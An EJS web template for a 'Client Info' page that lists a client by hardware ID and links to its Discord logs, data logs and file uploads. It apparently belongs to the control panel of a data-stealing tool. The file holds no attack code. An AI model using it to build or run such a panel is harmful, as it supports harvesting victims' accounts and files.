<!DOCTYPE html>
<html lang="en">
    <%- include("includes/head.ejs") %>
    <body>
        <div class="container-fluid h-100">
            <%- include("includes/navbar.ejs") %>
            <div class="d-flex align-items-center justify-content-center h-100">
                <div class="d-flex flex-column" style="width: 50%">
                    <h1 class="text align-self-center"><a style="font-size: 36px" href="#" onclick="window.history.back()">«</a> Client Info</h1>
                    <p class="text align-self-center" style="padding-bottom: 25px; color: rgb(180, 180, 180)">Client info for <%= hwid %>.</p>

                    <div class="d-flex justify-content-center bd-highlight mb-3">
                        <div class="p-2">
                            <a type="button" href="/panel/clients/<%= hwid %>/discord" class="btn btn-secondary">Discord Logs</a>
                        </div>
                        <div class="p-2">
                            <a type="button" href="/panel/clients/<%= hwid %>/data" class="btn btn-secondary">Data Logs</a>
                        </div>
                        <div class="p-2">
                            <a type="button" href="/panel/clients/<%= hwid %>/fileUploads" class="btn btn-secondary">File Uploads</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <%- include("includes/scripts.ejs") %>
    </body>
</html>
